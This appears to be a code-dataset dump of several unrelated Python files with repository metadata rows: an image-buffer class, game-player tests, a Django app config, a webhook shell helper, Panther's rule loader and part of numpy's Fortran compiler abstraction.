def __getitem__(self, item):
if item in self.data: return self.data[item]
mylog.info("Making a fixed resolution buffer of (%s) %d by %d" % \
(item, self.buff_size[0], self.buff_size[1]))
dd = self.data_source
width = self.ds.arr((self.bounds[1] - self.bounds[0],
self.bounds[3] - self.bounds[2],
self.bounds[5] - self.bounds[4]))
buff = off_axis_projection(dd.dd, dd.center, dd.normal_vector,
width, dd.resolution, item,
weight=dd.weight_field, volume=dd.volume,
no_ghost=dd.no_ghost,
interpolated=dd.interpolated,
north_vector=dd.north_vector,
method=dd.method)
ia = ImageArray(buff.swapaxes(0,1), info=self._get_info(item))
self[item] = ia
return ia
class ParticleImageBuffer(FixedResolutionBuffer):
def __init__(self, data_source, bounds, buff_size, antialias=True,
periodic=False):
self.data = {}
FixedResolutionBuffer.__init__(self, data_source, bounds, buff_size,
antialias, periodic)
axis = self.axis
xax = self.ds.coordinates.x_axis[axis]
yax = self.ds.coordinates.y_axis[axis]
ax_field_template = 'particle_position_%s'
self.x_field = ax_field_template % self.ds.coordinates.axis_name[xax]
self.y_field = ax_field_template % self.ds.coordinates.axis_name[yax]
def __getitem__(self, item):
if item in self.data:
return self.data[item]
mylog.info("Splatting (%s) onto a %d by %d mesh" %
(item, self.buff_size[0], self.buff_size[1]))
bounds = []
for b in self.bounds:
if hasattr(b, "in_units"):
b = float(b.in_units("code_length"))
bounds.append(b)
ftype = item[0]
x_data = self.data_source.dd[ftype, self.x_field]
y_data = self.data_source.dd[ftype, self.y_field]
data = self.data_source.dd[item]
px = (x_data - self.bounds[0]) / (self.bounds[1] - self.bounds[0])
py = (y_data - self.bounds[2]) / (self.bounds[3] - self.bounds[2])
mask = np.logical_and(np.logical_and(px >= 0.0, px <= 1.0),
np.logical_and(py >= 0.0, py <= 1.0))
weight_field = self.data_source.weight_field
if weight_field is None:
weight_data = np.ones_like(data.v)
else:
weight_data = self.data_source.dd[weight_field]
splat_vals = weight_data[mask]*data[mask]
buff = np.zeros(self.buff_size)
add_points_to_greyscale_image(buff,
px[mask],
py[mask],
splat_vals)
ia = ImageArray(buff, input_units=data.units,
info=self._get_info(item))
if weight_field is not None:
weight_buff = np.zeros(self.buff_size)
add_points_to_greyscale_image(weight_buff,
px[mask],
py[mask],
weight_data[mask])
weight_array = ImageArray(weight_buff,
input_units=weight_data.units,
info=self._get_info(item))
locs = np.where(weight_array > 0)
ia[locs] /= weight_array[locs]
self.data[item] = ia
return self.data[item]
# particle fields
def _get_data_source_fields(self):
exclude = self.data_source._key_fields + list(self._exclude_fields)
fields = getattr(self.data_source, "fields", [])
fields += getattr(self.data_source, "field_data", {}).keys()
for f in fields:
if f not in exclude:
self[f]
| true | true |
1c30687beb3e77c32ee8376ffc89c6780a92f2a7 | 2,205 | py | Python | imaginary/test/test_player.py | glyph/imaginary | 62299c8a0481bbee51444e688f45385a81cad328 | [
"MIT"
] | 25 | 2015-01-10T02:26:43.000Z | 2021-08-20T09:40:46.000Z | imaginary/test/test_player.py | DalavanCloud/imaginary | e84abc98d400cff5e262df2b34e725dde575af8e | [
"MIT"
] | 65 | 2015-01-07T08:02:53.000Z | 2022-02-06T02:15:09.000Z | imaginary/test/test_player.py | DalavanCloud/imaginary | e84abc98d400cff5e262df2b34e725dde575af8e | [
"MIT"
] | 7 | 2015-03-03T18:44:29.000Z | 2021-07-28T02:54:10.000Z |
"""
Tests for L{imaginary.wiring.player}.
"""
from twisted.trial import unittest
from axiom import store
from imaginary import objects
from imaginary.objects import Container
from imaginary.wiring import player
class PlayerTest(unittest.TestCase):
def setUp(self):
self.store = store.Store()
self.bob = objects.Thing(store=self.store, name=u"bob")
self.room = objects.Thing(store=self.store, name=u"a place")
roomContainer = Container.createFor(self.room, capacity=1000)
self.bob.moveTo(roomContainer)
self.actor = objects.Actor.createFor(self.bob)
self.player = player.Player(self.bob)
self.player.useColors = False
from twisted.test.proto_helpers import StringTransport
self.transport = StringTransport()
class Protocol:
write = self.transport.write
self.player.setProtocol(Protocol())
def testSend(self):
self.player.send("Hi\n")
self.assertEquals(self.transport.value(), "Hi\n")
self.player.send(("Hi", "\n"))
self.assertEquals(self.transport.value(), "Hi\nHi\n")
self.player.send(["Hi", "\n"])
self.assertEquals(self.transport.value(), "Hi\nHi\nHi\n")
self.player.send(i for i in ("Hi", "\n"))
self.assertEquals(self.transport.value(), "Hi\nHi\nHi\nHi\n")
def testDisconnect(self):
self.player.proto.terminal = None
self.player.disconnect()
self.assertIdentical(self.actor.getIntelligence(), None)
def test_ambiguity(self):
"""
When the player refers to something ambiguously, the error message
should enumerate the objects in question.
"""
for color in [u'red', u'green', u'blue']:
it = objects.Thing(store=self.store, name=u'%s thing' % (color,))
it.moveTo(self.room)
self.player.parse("take thing")
self.assertEquals(self.transport.value(),
"> take thing\n"
"Could you be more specific? When you said 'thing', "
"did you mean: a red thing, a green thing, "
"or a blue thing?\r\n")
| 31.5 | 80 | 0.610884 |
from twisted.trial import unittest
from axiom import store
from imaginary import objects
from imaginary.objects import Container
from imaginary.wiring import player
class PlayerTest(unittest.TestCase):
def setUp(self):
self.store = store.Store()
self.bob = objects.Thing(store=self.store, name=u"bob")
self.room = objects.Thing(store=self.store, name=u"a place")
roomContainer = Container.createFor(self.room, capacity=1000)
self.bob.moveTo(roomContainer)
self.actor = objects.Actor.createFor(self.bob)
self.player = player.Player(self.bob)
self.player.useColors = False
from twisted.test.proto_helpers import StringTransport
self.transport = StringTransport()
class Protocol:
write = self.transport.write
self.player.setProtocol(Protocol())
def testSend(self):
self.player.send("Hi\n")
self.assertEquals(self.transport.value(), "Hi\n")
self.player.send(("Hi", "\n"))
self.assertEquals(self.transport.value(), "Hi\nHi\n")
self.player.send(["Hi", "\n"])
self.assertEquals(self.transport.value(), "Hi\nHi\nHi\n")
self.player.send(i for i in ("Hi", "\n"))
self.assertEquals(self.transport.value(), "Hi\nHi\nHi\nHi\n")
def testDisconnect(self):
self.player.proto.terminal = None
self.player.disconnect()
self.assertIdentical(self.actor.getIntelligence(), None)
def test_ambiguity(self):
for color in [u'red', u'green', u'blue']:
it = objects.Thing(store=self.store, name=u'%s thing' % (color,))
it.moveTo(self.room)
self.player.parse("take thing")
self.assertEquals(self.transport.value(),
"> take thing\n"
"Could you be more specific? When you said 'thing', "
"did you mean: a red thing, a green thing, "
"or a blue thing?\r\n")
| true | true |
1c3068ae89b9a09ec68be9a9b0bf737c91b9fe3b | 97 | py | Python | usercontrol/apps.py | MinisterioPublicoRJ/mpplus | 23501db772172567c8d421c7af69ec43cddf1c20 | [
"MIT"
] | 1 | 2019-03-05T12:02:38.000Z | 2019-03-05T12:02:38.000Z | usercontrol/apps.py | MinisterioPublicoRJ/mpplus | 23501db772172567c8d421c7af69ec43cddf1c20 | [
"MIT"
] | 8 | 2020-02-11T23:14:48.000Z | 2022-02-10T10:53:19.000Z | usercontrol/apps.py | MinisterioPublicoRJ/mpplus | 23501db772172567c8d421c7af69ec43cddf1c20 | [
"MIT"
] | null | null | null | from django.apps import AppConfig
class UsercontrolConfig(AppConfig):
name = 'usercontrol'
| 16.166667 | 35 | 0.773196 | from django.apps import AppConfig
class UsercontrolConfig(AppConfig):
name = 'usercontrol'
| true | true |
1c3068b6efd9b527ae085460f22dc74a7f634a57 | 970 | py | Python | fei_webhook/app_webhook/shell_cmd.py | colingong/fei_webhook | 2acb8b8e36d05f87f06dcc1bf056beb92a41b157 | [
"Apache-2.0"
] | null | null | null | fei_webhook/app_webhook/shell_cmd.py | colingong/fei_webhook | 2acb8b8e36d05f87f06dcc1bf056beb92a41b157 | [
"Apache-2.0"
] | 6 | 2021-03-19T09:41:23.000Z | 2022-02-10T11:13:35.000Z | fei_webhook/app_webhook/shell_cmd.py | colingong/fei_webhook | 2acb8b8e36d05f87f06dcc1bf056beb92a41b157 | [
"Apache-2.0"
] | null | null | null | """执行shell cmd
"""
from subprocess import Popen, PIPE
from main_settings.settings import REPOS_PARENT_DIR
class Cmds(object):
def __init__(self, cmds):
self.cmds = cmds
self.repos_parent_dir = REPOS_PARENT_DIR
def run(self):
process = Popen('bash', shell=False, universal_newlines=True,
stdin=PIPE, stdout=PIPE, stderr=PIPE)
for cmd in self.cmds:
process.stdin.write(cmd + '\n')
process.stdin.close()
out = process.stdout.read()
err = process.stderr.read()
return out, err
if __name__ == '__main__':
from ..main_settings.settings import BASE_DIR
cmds = [
# ['ls', '-l'],
'pwpd',
'cd ../..',
'pwd ',
'cd ' + BASE_DIR,
'pwd',
'cd not_use',
'pwd',
# ['ls', '-l'],
]
r = ExcuteCmds(cmds)
out, err = r.run()
print(out)
print(err)
# r.__call__()
# print(r.__call__()) | 23.658537 | 69 | 0.542268 | from subprocess import Popen, PIPE
from main_settings.settings import REPOS_PARENT_DIR
class Cmds(object):
def __init__(self, cmds):
self.cmds = cmds
self.repos_parent_dir = REPOS_PARENT_DIR
def run(self):
process = Popen('bash', shell=False, universal_newlines=True,
stdin=PIPE, stdout=PIPE, stderr=PIPE)
for cmd in self.cmds:
process.stdin.write(cmd + '\n')
process.stdin.close()
out = process.stdout.read()
err = process.stderr.read()
return out, err
if __name__ == '__main__':
from ..main_settings.settings import BASE_DIR
cmds = [
'pwpd',
'cd ../..',
'pwd ',
'cd ' + BASE_DIR,
'pwd',
'cd not_use',
'pwd',
]
r = ExcuteCmds(cmds)
out, err = r.run()
print(out)
print(err)
| true | true |
1c3068e44147e3e52a0e984de1b23a558a13e8fb | 3,883 | py | Python | internal/log_analysis/rules_engine/src/rule.py | stoggi/panther | 72532101a201d26c03061b6ea4fc8092995e210f | [
"Apache-2.0"
] | 2 | 2021-12-17T01:24:21.000Z | 2021-12-18T17:13:45.000Z | internal/log_analysis/rules_engine/src/rule.py | stoggi/panther | 72532101a201d26c03061b6ea4fc8092995e210f | [
"Apache-2.0"
] | null | null | null | internal/log_analysis/rules_engine/src/rule.py | stoggi/panther | 72532101a201d26c03061b6ea4fc8092995e210f | [
"Apache-2.0"
] | 5 | 2021-12-16T02:16:43.000Z | 2022-03-26T14:38:37.000Z | # Panther is a scalable, powerful, cloud-native SIEM written in Golang/React.
# Copyright (C) 2020 Panther Labs Inc
#
# This program is free software: you can redistribute it and/or modify
# it under the terms of the GNU Affero General Public License as
# published by the Free Software Foundation, either version 3 of the
# License, or (at your option) any later version.
#
# This program is distributed in the hope that it will be useful,
# but WITHOUT ANY WARRANTY; without even the implied warranty of
# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the
# GNU Affero General Public License for more details.
#
# You should have received a copy of the GNU Affero General Public License
# along with this program. If not, see <https://www.gnu.org/licenses/>.
import os
import sys
import tempfile
from importlib import util as import_util
from pathlib import Path
from typing import Any, Dict, Union
from .logging import get_logger
_RULE_FOLDER = os.path.join(tempfile.gettempdir(), 'rules')
# Rule with ID 'aws_globals' contains common Python logic used by other rules
COMMON_MODULE_RULE_ID = 'aws_globals'
class Rule:
"""Panther rule metadata and imported module."""
logger = get_logger()
def __init__(self, rule_id: str, rule_body: str) -> None:
"""Import rule contents from disk.
Args:
rule_id: Unique rule identifier
rule_body: The rule body
"""
self.rule_id = rule_id
self._import_error = None
try:
self.store_rule(rule_id, rule_body)
self._module = self.import_rule_as_module(rule_id)
except Exception as err: # pylint: disable=broad-except
self._import_error = err
def store_rule(self, rule_id: str, rule_body: str) -> None:
"""Stores rule to disk."""
path = self.rule_id_to_path(rule_id)
self.logger.debug('storing rule in path {}'.format(path))
## Create dir if it doesn't exist
Path(os.path.dirname(path)).mkdir(parents=True, exist_ok=True)
with open(path, 'w') as py_file:
py_file.write(rule_body)
def import_rule_as_module(self, rule_id: str) -> Any:
"""Dynamically import a Python module from a file.
See also: https://docs.python.org/3/library/importlib.html#importing-a-source-file-directly
"""
path = self.rule_id_to_path(rule_id)
spec = import_util.spec_from_file_location(rule_id, path)
mod = import_util.module_from_spec(spec)
spec.loader.exec_module(mod) # type: ignore
self.logger.debug('imported module {} from path {}'.format(rule_id, path))
if rule_id == COMMON_MODULE_RULE_ID:
self.logger.debug('imported global module {} from path {}'.format(rule_id, path))
# Importing it as a shared module
sys.modules[rule_id] = mod
return mod
def rule_id_to_path(self, rule_id: str) -> str:
safe_id = ''.join(x if self.allowed_char(x) else '_' for x in rule_id)
path = os.path.join(_RULE_FOLDER, safe_id + '.py')
return path
def allowed_char(self, char: str) -> bool:
"""Return true if the character is part of a valid rule ID."""
return char.isalnum() or char in {' ', '-', '.'}
def run(self, event: Dict[str, Any]) -> Union[bool, Exception]:
"""Analyze a log line with this rule and return True, False, or an error."""
if self._import_error:
return self._import_error
try:
# Python source should have a method called "rule"
matched = self._module.rule(event)
except Exception as err: # pylint: disable=broad-except
return err
if not isinstance(matched, bool):
return Exception('rule returned {}, expected bool'.format(type(matched).__name__))
return matched
| 37.699029 | 99 | 0.662632 |
import os
import sys
import tempfile
from importlib import util as import_util
from pathlib import Path
from typing import Any, Dict, Union
from .logging import get_logger
_RULE_FOLDER = os.path.join(tempfile.gettempdir(), 'rules')
COMMON_MODULE_RULE_ID = 'aws_globals'
class Rule:
logger = get_logger()
def __init__(self, rule_id: str, rule_body: str) -> None:
self.rule_id = rule_id
self._import_error = None
try:
self.store_rule(rule_id, rule_body)
self._module = self.import_rule_as_module(rule_id)
except Exception as err:
self._import_error = err
def store_rule(self, rule_id: str, rule_body: str) -> None:
path = self.rule_id_to_path(rule_id)
self.logger.debug('storing rule in path {}'.format(path))
th)).mkdir(parents=True, exist_ok=True)
with open(path, 'w') as py_file:
py_file.write(rule_body)
def import_rule_as_module(self, rule_id: str) -> Any:
path = self.rule_id_to_path(rule_id)
spec = import_util.spec_from_file_location(rule_id, path)
mod = import_util.module_from_spec(spec)
spec.loader.exec_module(mod) # type: ignore
self.logger.debug('imported module {} from path {}'.format(rule_id, path))
if rule_id == COMMON_MODULE_RULE_ID:
self.logger.debug('imported global module {} from path {}'.format(rule_id, path))
# Importing it as a shared module
sys.modules[rule_id] = mod
return mod
def rule_id_to_path(self, rule_id: str) -> str:
safe_id = ''.join(x if self.allowed_char(x) else '_' for x in rule_id)
path = os.path.join(_RULE_FOLDER, safe_id + '.py')
return path
def allowed_char(self, char: str) -> bool:
return char.isalnum() or char in {' ', '-', '.'}
def run(self, event: Dict[str, Any]) -> Union[bool, Exception]:
if self._import_error:
return self._import_error
try:
# Python source should have a method called "rule"
matched = self._module.rule(event)
except Exception as err: # pylint: disable=broad-except
return err
if not isinstance(matched, bool):
return Exception('rule returned {}, expected bool'.format(type(matched).__name__))
return matched
| true | true |
1c3069363f84e2150f277a24369f3e3872ad0037 | 39,984 | py | Python | .venv/lib/python3.8/site-packages/numpy/distutils/fcompiler/__init__.py | acrucetta/Chicago_COVI_WebApp | a37c9f492a20dcd625f8647067394617988de913 | [
"MIT",
"Unlicense"
] | 115 | 2020-06-18T15:00:58.000Z | 2022-03-02T10:13:19.000Z | .venv/lib/python3.8/site-packages/numpy/distutils/fcompiler/__init__.py | acrucetta/Chicago_COVI_WebApp | a37c9f492a20dcd625f8647067394617988de913 | [
"MIT",
"Unlicense"
] | 88 | 2020-04-23T18:33:38.000Z | 2021-08-02T06:25:47.000Z | bot/lib/python3.7/site-packages/numpy/distutils/fcompiler/__init__.py | carlosrh18/DavinciBot | d73a6b7f68d7bab25d134d3f85c6b63a86c206c5 | [
"MIT"
] | 60 | 2020-07-22T14:53:10.000Z | 2022-03-23T10:17:59.000Z | """numpy.distutils.fcompiler
Contains FCompiler, an abstract base class that defines the interface
for the numpy.distutils Fortran compiler abstraction model.
Terminology:
To be consistent, where the term 'executable' is used, it means the single
file, like 'gcc', that is executed, and should be a string. In contrast,
'command' means the entire command line, like ['gcc', '-c', 'file.c'], and
should be a list.
But note that FCompiler.executables is actually a dictionary of commands.
"""
__all__ = ['FCompiler', 'new_fcompiler', 'show_fcompilers',
'dummy_fortran_file']
import os
import sys
import re
from numpy.compat import open_latin1
from distutils.sysconfig import get_python_lib
from distutils.fancy_getopt import FancyGetopt
from distutils.errors import DistutilsModuleError, \
DistutilsExecError, CompileError, LinkError, DistutilsPlatformError
from distutils.util import split_quoted, strtobool
from numpy.distutils.ccompiler import CCompiler, gen_lib_options
from numpy.distutils import log
from numpy.distutils.misc_util import is_string, all_strings, is_sequence, \
make_temp_file, get_shared_lib_extension
from numpy.distutils.exec_command import find_executable
from numpy.distutils import _shell_utils
from .environment import EnvironmentConfig
__metaclass__ = type
class CompilerNotFound(Exception):
pass
def flaglist(s):
if is_string(s):
return split_quoted(s)
else:
return s
def str2bool(s):
if is_string(s):
return strtobool(s)
return bool(s)
def is_sequence_of_strings(seq):
return is_sequence(seq) and all_strings(seq)
class FCompiler(CCompiler):
"""Abstract base class to define the interface that must be implemented
by real Fortran compiler classes.
Methods that subclasses may redefine:
update_executables(), find_executables(), get_version()
get_flags(), get_flags_opt(), get_flags_arch(), get_flags_debug()
get_flags_f77(), get_flags_opt_f77(), get_flags_arch_f77(),
get_flags_debug_f77(), get_flags_f90(), get_flags_opt_f90(),
get_flags_arch_f90(), get_flags_debug_f90(),
get_flags_fix(), get_flags_linker_so()
DON'T call these methods (except get_version) after
constructing a compiler instance or inside any other method.
All methods, except update_executables() and find_executables(),
may call the get_version() method.
After constructing a compiler instance, always call customize(dist=None)
method that finalizes compiler construction and makes the following
attributes available:
compiler_f77
compiler_f90
compiler_fix
linker_so
archiver
ranlib
libraries
library_dirs
"""
# These are the environment variables and distutils keys used.
# Each configuration description is
# (<hook name>, <environment variable>, <key in distutils.cfg>, <convert>, <append>)
# The hook names are handled by the self._environment_hook method.
# - names starting with 'self.' call methods in this class
# - names starting with 'exe.' return the key in the executables dict
# - names like 'flags.YYY' return self.get_flag_YYY()
# convert is either None or a function to convert a string to the
# appropriate type used.
distutils_vars = EnvironmentConfig(
distutils_section='config_fc',
noopt = (None, None, 'noopt', str2bool, False),
noarch = (None, None, 'noarch', str2bool, False),
debug = (None, None, 'debug', str2bool, False),
verbose = (None, None, 'verbose', str2bool, False),
)
command_vars = EnvironmentConfig(
distutils_section='config_fc',
compiler_f77 = ('exe.compiler_f77', 'F77', 'f77exec', None, False),
compiler_f90 = ('exe.compiler_f90', 'F90', 'f90exec', None, False),
compiler_fix = ('exe.compiler_fix', 'F90', 'f90exec', None, False),
version_cmd = ('exe.version_cmd', None, None, None, False),
linker_so = ('exe.linker_so', 'LDSHARED', 'ldshared', None, False),
linker_exe = ('exe.linker_exe', 'LD', 'ld', None, False),
archiver = (None, 'AR', 'ar', None, False),
ranlib = (None, 'RANLIB', 'ranlib', None, False),
)
flag_vars = EnvironmentConfig(
distutils_section='config_fc',
f77 = ('flags.f77', 'F77FLAGS', 'f77flags', flaglist, True),
f90 = ('flags.f90', 'F90FLAGS', 'f90flags', flaglist, True),
free = ('flags.free', 'FREEFLAGS', 'freeflags', flaglist, True),
fix = ('flags.fix', None, None, flaglist, False),
opt = ('flags.opt', 'FOPT', 'opt', flaglist, True),
opt_f77 = ('flags.opt_f77', None, None, flaglist, False),
opt_f90 = ('flags.opt_f90', None, None, flaglist, False),
arch = ('flags.arch', 'FARCH', 'arch', flaglist, False),
arch_f77 = ('flags.arch_f77', None, None, flaglist, False),
arch_f90 = ('flags.arch_f90', None, None, flaglist, False),
debug = ('flags.debug', 'FDEBUG', 'fdebug', flaglist, True),
debug_f77 = ('flags.debug_f77', None, None, flaglist, False),
debug_f90 = ('flags.debug_f90', None, None, flaglist, False),
flags = ('self.get_flags', 'FFLAGS', 'fflags', flaglist, True),
linker_so = ('flags.linker_so', 'LDFLAGS', 'ldflags', flaglist, True),
linker_exe = ('flags.linker_exe', 'LDFLAGS', 'ldflags', flaglist, True),
ar = ('flags.ar', 'ARFLAGS', 'arflags', flaglist, True),
)
language_map = {'.f': 'f77',
'.for': 'f77',
'.F': 'f77', # XXX: needs preprocessor
'.ftn': 'f77',
'.f77': 'f77',
'.f90': 'f90',
'.F90': 'f90', # XXX: needs preprocessor
'.f95': 'f90',
}
language_order = ['f90', 'f77']
# These will be set by the subclass
compiler_type = None
compiler_aliases = ()
version_pattern = None
possible_executables = []
executables = {
'version_cmd': ["f77", "-v"],
'compiler_f77': ["f77"],
'compiler_f90': ["f90"],
'compiler_fix': ["f90", "-fixed"],
'linker_so': ["f90", "-shared"],
'linker_exe': ["f90"],
'archiver': ["ar", "-cr"],
'ranlib': None,
}
# If compiler does not support compiling Fortran 90 then it can
# suggest using another compiler. For example, gnu would suggest
# gnu95 compiler type when there are F90 sources.
suggested_f90_compiler = None
compile_switch = "-c"
object_switch = "-o " # Ending space matters! It will be stripped
# but if it is missing then object_switch
# will be prefixed to object file name by
# string concatenation.
library_switch = "-o " # Ditto!
# Switch to specify where module files are created and searched
# for USE statement. Normally it is a string and also here ending
# space matters. See above.
module_dir_switch = None
# Switch to specify where module files are searched for USE statement.
module_include_switch = '-I'
pic_flags = [] # Flags to create position-independent code
src_extensions = ['.for', '.ftn', '.f77', '.f', '.f90', '.f95', '.F', '.F90', '.FOR']
obj_extension = ".o"
shared_lib_extension = get_shared_lib_extension()
static_lib_extension = ".a" # or .lib
static_lib_format = "lib%s%s" # or %s%s
shared_lib_format = "%s%s"
exe_extension = ""
_exe_cache = {}
_executable_keys = ['version_cmd', 'compiler_f77', 'compiler_f90',
'compiler_fix', 'linker_so', 'linker_exe', 'archiver',
'ranlib']
# This will be set by new_fcompiler when called in
# command/{build_ext.py, build_clib.py, config.py} files.
c_compiler = None
# extra_{f77,f90}_compile_args are set by build_ext.build_extension method
extra_f77_compile_args = []
extra_f90_compile_args = []
def __init__(self, *args, **kw):
CCompiler.__init__(self, *args, **kw)
self.distutils_vars = self.distutils_vars.clone(self._environment_hook)
self.command_vars = self.command_vars.clone(self._environment_hook)
self.flag_vars = self.flag_vars.clone(self._environment_hook)
self.executables = self.executables.copy()
for e in self._executable_keys:
if e not in self.executables:
self.executables[e] = None
# Some methods depend on .customize() being called first, so
# this keeps track of whether that's happened yet.
self._is_customised = False
def __copy__(self):
obj = self.__new__(self.__class__)
obj.__dict__.update(self.__dict__)
obj.distutils_vars = obj.distutils_vars.clone(obj._environment_hook)
obj.command_vars = obj.command_vars.clone(obj._environment_hook)
obj.flag_vars = obj.flag_vars.clone(obj._environment_hook)
obj.executables = obj.executables.copy()
return obj
def copy(self):
return self.__copy__()
# Use properties for the attributes used by CCompiler. Setting them
# as attributes from the self.executables dictionary is error-prone,
# so we get them from there each time.
def _command_property(key):
def fget(self):
assert self._is_customised
return self.executables[key]
return property(fget=fget)
version_cmd = _command_property('version_cmd')
compiler_f77 = _command_property('compiler_f77')
compiler_f90 = _command_property('compiler_f90')
compiler_fix = _command_property('compiler_fix')
linker_so = _command_property('linker_so')
linker_exe = _command_property('linker_exe')
archiver = _command_property('archiver')
ranlib = _command_property('ranlib')
# Make our terminology consistent.
def set_executable(self, key, value):
self.set_command(key, value)
def set_commands(self, **kw):
for k, v in kw.items():
self.set_command(k, v)
def set_command(self, key, value):
if not key in self._executable_keys:
raise ValueError(
"unknown executable '%s' for class %s" %
(key, self.__class__.__name__))
if is_string(value):
value = split_quoted(value)
assert value is None or is_sequence_of_strings(value[1:]), (key, value)
self.executables[key] = value
######################################################################
## Methods that subclasses may redefine. But don't call these methods!
## They are private to FCompiler class and may return unexpected
## results if used elsewhere. So, you have been warned..
def find_executables(self):
"""Go through the self.executables dictionary, and attempt to
find and assign appropriate executables.
Executable names are looked for in the environment (environment
variables, the distutils.cfg, and command line), the 0th-element of
the command list, and the self.possible_executables list.
Also, if the 0th element is "<F77>" or "<F90>", the Fortran 77
or the Fortran 90 compiler executable is used, unless overridden
by an environment setting.
Subclasses should call this if overridden.
"""
assert self._is_customised
exe_cache = self._exe_cache
def cached_find_executable(exe):
if exe in exe_cache:
return exe_cache[exe]
fc_exe = find_executable(exe)
exe_cache[exe] = exe_cache[fc_exe] = fc_exe
return fc_exe
def verify_command_form(name, value):
if value is not None and not is_sequence_of_strings(value):
raise ValueError(
"%s value %r is invalid in class %s" %
(name, value, self.__class__.__name__))
def set_exe(exe_key, f77=None, f90=None):
cmd = self.executables.get(exe_key, None)
if not cmd:
return None
# Note that we get cmd[0] here if the environment doesn't
# have anything set
exe_from_environ = getattr(self.command_vars, exe_key)
if not exe_from_environ:
possibles = [f90, f77] + self.possible_executables
else:
possibles = [exe_from_environ] + self.possible_executables
seen = set()
unique_possibles = []
for e in possibles:
if e == '<F77>':
e = f77
elif e == '<F90>':
e = f90
if not e or e in seen:
continue
seen.add(e)
unique_possibles.append(e)
for exe in unique_possibles:
fc_exe = cached_find_executable(exe)
if fc_exe:
cmd[0] = fc_exe
return fc_exe
self.set_command(exe_key, None)
return None
ctype = self.compiler_type
f90 = set_exe('compiler_f90')
if not f90:
f77 = set_exe('compiler_f77')
if f77:
log.warn('%s: no Fortran 90 compiler found' % ctype)
else:
raise CompilerNotFound('%s: f90 nor f77' % ctype)
else:
f77 = set_exe('compiler_f77', f90=f90)
if not f77:
log.warn('%s: no Fortran 77 compiler found' % ctype)
set_exe('compiler_fix', f90=f90)
set_exe('linker_so', f77=f77, f90=f90)
set_exe('linker_exe', f77=f77, f90=f90)
set_exe('version_cmd', f77=f77, f90=f90)
set_exe('archiver')
set_exe('ranlib')
def update_executables(self):
"""Called at the beginning of customisation. Subclasses should
override this if they need to set up the executables dictionary.
Note that self.find_executables() is run afterwards, so the
self.executables dictionary values can contain <F77> or <F90> as
the command, which will be replaced by the found F77 or F90
compiler.
"""
pass
def get_flags(self):
"""List of flags common to all compiler types."""
return [] + self.pic_flags
def _get_command_flags(self, key):
cmd = self.executables.get(key, None)
if cmd is None:
return []
return cmd[1:]
def get_flags_f77(self):
"""List of Fortran 77 specific flags."""
return self._get_command_flags('compiler_f77')
def get_flags_f90(self):
"""List of Fortran 90 specific flags."""
return self._get_command_flags('compiler_f90')
def get_flags_free(self):
"""List of Fortran 90 free format specific flags."""
return []
def get_flags_fix(self):
"""List of Fortran 90 fixed format specific flags."""
return self._get_command_flags('compiler_fix')
def get_flags_linker_so(self):
"""List of linker flags to build a shared library."""
return self._get_command_flags('linker_so')
def get_flags_linker_exe(self):
"""List of linker flags to build an executable."""
return self._get_command_flags('linker_exe')
def get_flags_ar(self):
"""List of archiver flags. """
return self._get_command_flags('archiver')
def get_flags_opt(self):
"""List of architecture independent compiler flags."""
return []
def get_flags_arch(self):
"""List of architecture dependent compiler flags."""
return []
def get_flags_debug(self):
"""List of compiler flags to compile with debugging information."""
return []
get_flags_opt_f77 = get_flags_opt_f90 = get_flags_opt
get_flags_arch_f77 = get_flags_arch_f90 = get_flags_arch
get_flags_debug_f77 = get_flags_debug_f90 = get_flags_debug
def get_libraries(self):
"""List of compiler libraries."""
return self.libraries[:]
def get_library_dirs(self):
"""List of compiler library directories."""
return self.library_dirs[:]
def get_version(self, force=False, ok_status=[0]):
assert self._is_customised
version = CCompiler.get_version(self, force=force, ok_status=ok_status)
if version is None:
raise CompilerNotFound()
return version
############################################################
## Public methods:
def customize(self, dist = None):
"""Customize Fortran compiler.
This method gets Fortran compiler specific information from
(i) class definition, (ii) environment, (iii) distutils config
files, and (iv) command line (later overrides earlier).
This method should be always called after constructing a
compiler instance. But not in __init__ because Distribution
instance is needed for (iii) and (iv).
"""
log.info('customize %s' % (self.__class__.__name__))
self._is_customised = True
self.distutils_vars.use_distribution(dist)
self.command_vars.use_distribution(dist)
self.flag_vars.use_distribution(dist)
self.update_executables()
# find_executables takes care of setting the compiler commands,
# version_cmd, linker_so, linker_exe, ar, and ranlib
self.find_executables()
noopt = self.distutils_vars.get('noopt', False)
noarch = self.distutils_vars.get('noarch', noopt)
debug = self.distutils_vars.get('debug', False)
f77 = self.command_vars.compiler_f77
f90 = self.command_vars.compiler_f90
f77flags = []
f90flags = []
freeflags = []
fixflags = []
if f77:
f77 = _shell_utils.NativeParser.split(f77)
f77flags = self.flag_vars.f77
if f90:
f90 = _shell_utils.NativeParser.split(f90)
f90flags = self.flag_vars.f90
freeflags = self.flag_vars.free
# XXX Assuming that free format is default for f90 compiler.
fix = self.command_vars.compiler_fix
# NOTE: this and similar examples are probably just
# excluding --coverage flag when F90 = gfortran --coverage
# instead of putting that flag somewhere more appropriate
# this and similar examples where a Fortran compiler
# environment variable has been customized by CI or a user
# should perhaps eventually be more thoroughly tested and more
# robustly handled
if fix:
fix = _shell_utils.NativeParser.split(fix)
fixflags = self.flag_vars.fix + f90flags
oflags, aflags, dflags = [], [], []
# examine get_flags_<tag>_<compiler> for extra flags
# only add them if the method is different from get_flags_<tag>
def get_flags(tag, flags):
# note that self.flag_vars.<tag> calls self.get_flags_<tag>()
flags.extend(getattr(self.flag_vars, tag))
this_get = getattr(self, 'get_flags_' + tag)
for name, c, flagvar in [('f77', f77, f77flags),
('f90', f90, f90flags),
('f90', fix, fixflags)]:
t = '%s_%s' % (tag, name)
if c and this_get is not getattr(self, 'get_flags_' + t):
flagvar.extend(getattr(self.flag_vars, t))
if not noopt:
get_flags('opt', oflags)
if not noarch:
get_flags('arch', aflags)
if debug:
get_flags('debug', dflags)
fflags = self.flag_vars.flags + dflags + oflags + aflags
if f77:
self.set_commands(compiler_f77=f77+f77flags+fflags)
if f90:
self.set_commands(compiler_f90=f90+freeflags+f90flags+fflags)
if fix:
self.set_commands(compiler_fix=fix+fixflags+fflags)
#XXX: Do we need LDSHARED->SOSHARED, LDFLAGS->SOFLAGS
linker_so = self.linker_so
if linker_so:
linker_so_flags = self.flag_vars.linker_so
if sys.platform.startswith('aix'):
python_lib = get_python_lib(standard_lib=1)
ld_so_aix = os.path.join(python_lib, 'config', 'ld_so_aix')
python_exp = os.path.join(python_lib, 'config', 'python.exp')
linker_so = [ld_so_aix] + linker_so + ['-bI:'+python_exp]
self.set_commands(linker_so=linker_so+linker_so_flags)
